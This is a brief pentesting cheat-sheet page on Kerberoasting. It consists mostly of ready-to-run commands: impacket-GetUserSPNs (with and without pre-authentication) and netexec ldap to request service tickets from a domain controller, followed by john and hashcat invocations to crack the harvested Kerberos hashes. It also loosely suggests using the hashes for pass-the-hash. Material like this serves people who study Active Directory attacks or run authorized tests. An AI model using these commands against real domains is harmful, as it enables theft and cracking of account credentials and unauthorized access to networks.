Kerberoasting Attack
Last modified: 2024-12-24
Kerberoasting is a attack technique against Kerberos with cracking passwords using a credential already gathered.
Attack
If we have a password hash of a user, we might be able to find another user credential using the hash.
impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
# Without pre-authentication
# -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413
impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/
netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt
After finding hashes, we can crack it or use for pass-the-hash attack.
To crack, run the following commands:
john --format=krb5tgs --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13100 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19600 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19700 -a 0 hash.txt wordlist.txt
Note that we may need to modify the hash format a bit so that john or hashcat can recognize it.